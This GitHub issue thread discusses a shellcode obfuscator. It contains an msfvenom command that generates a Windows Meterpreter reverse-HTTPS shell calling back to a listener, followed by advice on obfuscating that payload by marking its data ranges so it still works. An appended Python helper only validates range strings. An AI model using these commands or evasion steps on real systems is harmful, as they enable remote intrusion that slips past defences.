kgretzky / python-x86-obfuscator

This is a **WIP** tool that performs shellcode obfuscation in the x86 instruction set.
MIT License

Can't generate working shellcode #8

Open vysecurity opened 8 years ago

vysecurity commented 8 years ago

So all of the generated shell code seems to be broken...

I can't generate working shell code that does not crash.

kgretzky commented 8 years ago

Can you send me one of the shellcodes that you are trying to obfuscate? They may have some hardcoded offsets that make obfuscation impossible.

You can send it in binary form and I will disassemble it myself.

vysecurity commented 8 years ago

Email? :)

vysecurity commented 8 years ago

Actually, I just did:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.58.128 LPORT=443 -f raw -o /root/sc.bin

python x86_obf.py -i /root/sc.bin -o /root/sc2.bin -r0-184

vysecurity commented 8 years ago

sc.bin injects fine and calls back. sc2.bin crashes.

kgretzky commented 8 years ago

Ah sure :)

kuba -at- breakdev.org

kgretzky commented 8 years ago

Can you send me the sc.bin file? I don't have the metasploit environment around me currently. I will take a look at it and let you know what's up.

vysecurity commented 8 years ago

Sent Email.

kgretzky commented 8 years ago

Thanks, got it! I took a look and it seems the reverse_https has a lot of static data (of variable length at every generation unfortunately), so before obfuscating the generated shellcode you need to specify the proper data ranges, so that the obfuscator knows which parts of the shellcode are not code up for obfuscation.

Take a look: http://i.imgur.com/lN7W7t3.png I highlighted the largest data block in the middle, and there is also a data block in the end with the IP address string. You need to view each generated shellcode and manually figure out the data ranges.

In your situation for this specific sc.bin file, the argument for specifying code ranges would look like this: -r0-184,329-465,481-490

For now I'd advise using the reverse_tcp payload as it doesn't have any static data blocks. I will be working on a Metasploit generator tool using the Obfusion library that will simplify the process of generating obfuscated shellcodes.
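To make the -r argument concrete, here is an added Python example (not code from python-x86-obfuscator or from either commenter) that parses a range spec like the one above, validates it, and reports which offsets are left as data. It runs against a constructed 520-byte stand-in for sc.bin, not the real payload, and assumes that each start-end pair is inclusive on both ends and that every byte outside the listed ranges is data the obfuscator must copy through unchanged; neither assumption is stated in the thread.

```python
"""
Split a raw byte buffer into "code" and "data" segments from a range
specification written the way the thread writes it: "0-184,329-465,481-490".

Constructed example; not part of python-x86-obfuscator.
Assumptions (not stated in the thread):
  * "start-end" is inclusive on both ends;
  * every offset not named in the spec is data and must be left untouched.
"""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Segment:
    start: int   # first offset covered (inclusive)
    end: int     # last offset covered (inclusive)
    kind: str    # "code" (listed in -r) or "data" (everything else)


def parse_ranges(spec: str, length: int) -> List[Tuple[int, int]]:
    """Parse 'a-b,c-d,...' into sorted, validated (a, b) pairs.

    Raises ValueError on a malformed pair, reversed bounds, an offset past
    the end of the buffer, or overlapping pairs: each of these would make
    the obfuscator rewrite bytes that are not code, which is one way to end
    up with a payload that crashes.
    """
    pairs: List[Tuple[int, int]] = []
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        lo_s, sep, hi_s = item.partition("-")
        if sep != "-" or not lo_s.isdigit() or not hi_s.isdigit():
            raise ValueError(f"malformed range {item!r}")
        lo, hi = int(lo_s), int(hi_s)
        if lo > hi:
            raise ValueError(f"reversed range {item!r}")
        if hi >= length:
            raise ValueError(f"range {item!r} exceeds buffer of {length} bytes")
        pairs.append((lo, hi))
    pairs.sort()
    for (_, prev_hi), (cur_lo, _) in zip(pairs, pairs[1:]):
        if cur_lo <= prev_hi:
            raise ValueError("overlapping code ranges")
    return pairs


def segment_buffer(buf: bytes, spec: str) -> List[Segment]:
    """Return the buffer as alternating code/data segments in offset order.

    Offsets not named in `spec` are reported as data; those are the bytes
    that must be copied through untouched (for example the IP string the
    thread mentions at the end of a reverse_https payload).
    """
    segments: List[Segment] = []
    cursor = 0
    for lo, hi in parse_ranges(spec, len(buf)):
        if lo > cursor:
            segments.append(Segment(cursor, lo - 1, "data"))
        segments.append(Segment(lo, hi, "code"))
        cursor = hi + 1
    if cursor < len(buf):
        segments.append(Segment(cursor, len(buf) - 1, "data"))
    return segments


def data_byte_count(buf: bytes, spec: str) -> int:
    """Number of bytes that fall outside the listed code ranges."""
    return sum(s.end - s.start + 1
               for s in segment_buffer(buf, spec) if s.kind == "data")


# Constructed stand-in for sc.bin: 520 filler bytes laid out so that the
# three code ranges from the thread are separated by data blocks, with a
# printable "IP string" placed in the tail data block. Real payload bytes
# are deliberately not reproduced here.
SAMPLE = bytearray(b"\x90" * 520)
SAMPLE[185:329] = b"\x00" * 144        # constructed data block between code ranges
SAMPLE[466:481] = b"\x00" * 15         # constructed data block between code ranges
SAMPLE[491:520] = b"192.0.2.10\x00" + b"\x00" * 18  # constructed tail with an IP string
SAMPLE = bytes(SAMPLE)

if __name__ == "__main__":
    for label, spec in (("original", "0-184"),
                        ("corrected", "0-184,329-465,481-490")):
        print(f"{label}: {data_byte_count(SAMPLE, spec)} bytes treated as data")
        for seg in segment_buffer(SAMPLE, spec):
            print(f"  {seg.kind:4} {seg.start:4}-{seg.end:4}")
```

With the original spec "0-184" everything after offset 184 is reported as data, so the second and third code blocks would never be processed; with the corrected spec the data blocks between and after the code ranges are the only bytes left out. Malformed, reversed, out-of-bounds and overlapping ranges are rejected before any bytes are touched.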

vysecurity commented 8 years ago

Thanks. I think I get it. I'll go into some more work with this :)